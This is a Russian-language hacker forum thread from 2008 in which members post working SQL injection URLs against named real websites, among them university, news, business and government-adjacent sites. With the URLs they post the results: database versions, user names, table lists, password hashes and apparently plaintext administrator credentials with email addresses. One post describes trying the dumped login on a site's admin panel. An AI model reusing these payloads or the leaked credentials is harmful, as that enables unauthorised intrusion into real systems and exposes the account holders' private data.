HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.01.2008, 21:31
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
С нами: 9839462

Репутация: 200
По умолчанию

http://news.mc.duke.edu/news/article.php?id=10200%20and%201=2%20union%20all%20% 20select%201,2,3,4,5,concat(user,char(58),password ,char(58)),7,8%20from%20mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384

Хеши расшифровать не удалось
 
Ответить с цитированием

  #2  
Старый 13.01.2008, 22:20
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами: 9650471

Репутация: -2
По умолчанию

Цитата:
Сообщение от A2GIL  
http://news.mc.duke.edu/news/article.php?id=10200%20and%201=2%20union%20all%20% 20select%201,2,3,4,5,concat(user,char(58),password ,char(58)),7,8%20from%20mysql.user/*

root:623460e26f081bbc
web:761b2fc844890384

Хеши расшифровать не удалось

я их уже сто лет как выложил:Р
 
Ответить с цитированием

  #3  
Старый 13.01.2008, 21:33
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

http://www.babwnews.com/article.php?id=-807+union+select+1,2,3,4,5,concat_ws(0x2f,version( ),user(),database()),7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard/babw4_admin@localhost/babw4_A31511
-----------------------------------------------------------------------
http://www.teamfishcake.co.uk/article.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*
4.0.27/teamfish_db@localhost/teamfish_site
-----------------------------------------------------------------------
http://www.tayport.org.uk/article.php?id=-75+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5/*
4.1.20/tayportuk@localhost/tayportuk
-----------------------------------------------------------------------
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*
5.0.45-log/basem_m2007@80.243.178.90/basem_m2007
Все таблицы:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,table_name,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+ from+information_schema.tables/*
Все колонки:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,column_name,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 +from+information_schema.columns/*
Есть таблица members
В ней есть полезные колонки:
id
email
password

http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,ema il,password),8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61+from+members/*
Еще есть таблица poll_user
В ней полезные колонки
user_id
username
userpass

http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x2f,user_i d,username,userpass),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61+from+poll_user/*
1/admin/21232f297a57a5a743894a0e4a801fc3- admin
Админка: http://basem.co.uk/admin/
Но пароль не подходит((

Последний раз редактировалось Tigger; 13.01.2008 в 21:57..
 
Ответить с цитированием

  #4  
Старый 13.01.2008, 22:37
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию

Цитата:
Сообщение от Tigger  
Админка: http://basem.co.uk/admin/
Но пароль не подходит((
Код:
http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+settings+limit+0,1/*
admin:basemc3ntral1:info@basem.co.uk
feeadmin:feeadmin3rr:info@basem.co.uk
detailsadmin:detailsadmin123:info@basem.co.uk
 
Ответить с цитированием

  #5  
Старый 13.01.2008, 22:42
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

http://www.electrob.ru/news.php?act=by_id&news_id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

4.1.22/site_electrob/electrob@localhost

----------------------------------------------------------------------------

http://www.tfdecor.ru/news/index.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user())/*

4.1.21-log/db00105457/00105457@localhost
----------------------------------------------------------------------------

liki.in.ua


http://liki.in.ua/index.html?r=4&nov=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

5.0.45-log/liki/root@localhost



http://liki.in.ua/index.html?r=4&nov=-1+union+select+1,2,concat_ws(0x2F,user_login,user_ pass,user_email),4,5,6,7+from+3dom.wp_users+limit+ 0,1/*

логин/хеш/мейл
admin/b225a89b54f9b8df014a7a1a9a997f58/maxim@infosvit.com.ua
 
Ответить с цитированием

  #6  
Старый 14.01.2008, 14:58
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
С нами: 9969506

Репутация: 252
По умолчанию

Код:
http://www.moiki.net/articles.php?id=99999+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES/*
lucifer542_moi@localhost:lucifer542_moi:5.0.45-community
 
Ответить с цитированием

  #7  
Старый 14.01.2008, 15:38
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

http://www.logotypes.com.ua/category.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase())/*
 
Ответить с цитированием

  #8  
Старый 14.01.2008, 15:48
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

www.m-economy.ru - Журнал Проблемы современной экономики
Код:
http://www.m-economy.ru/index.php3?rub=999+union+select+0,1,table_name,user(),4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,21,22,23,24,25,26,27,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+INFORMATION_SCHEMA.TABLES/*

5.0.45-log
mysqlmeconomy@web.delfa.net
www.emo.de - фирма какая-то
Код:
http://www.emo.de/de/index.php?news_id=-1+union+select+0,1,2,3,concat(version(),%22;%22,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

DB_NAME: db_20022_0001
DB_HOST: localhost
DB_USER: db_20022_0001

Последний раз редактировалось it's my; 14.01.2008 в 16:18..
 
Ответить с цитированием

  #9  
Старый 14.01.2008, 17:06
sedoy_xxx
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
С нами: 10447586

Репутация: 117
По умолчанию

http://cgsc2.biology.yale.edu/
Код:
http://cgsc2.biology.yale.edu/Strain.php?ID=-68076+union+select+1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),3,4,5,6/*
user():WebUser@localhost
database():cgsc
version():5.0.27-standard-log
@@version_compile_os:apple-darwin8.5.1
root:1FAF9E2DAABFA7B67F973E07733089BFEECC5CA2
 
Ответить с цитированием

  #10  
Старый 14.01.2008, 19:13
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

http://www.attik.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,cast(version ()+as+binary),cast(database()+as+binary),cast(user ()+as+binary)),6/*

4.1.14-standard-log/u00043_attik/u00043_attik@localhost
-----------------------------------------------------------------------------

http://varga.narkote.net/news.php?id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7/*

4.1.16-standard-log/povedenie/rfcservice@lbarbero-2.m-10.ru

-----------------------------------------------------------------------------

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=(select+db_name())--

nobile

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=(select+system_user)--

nobile
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.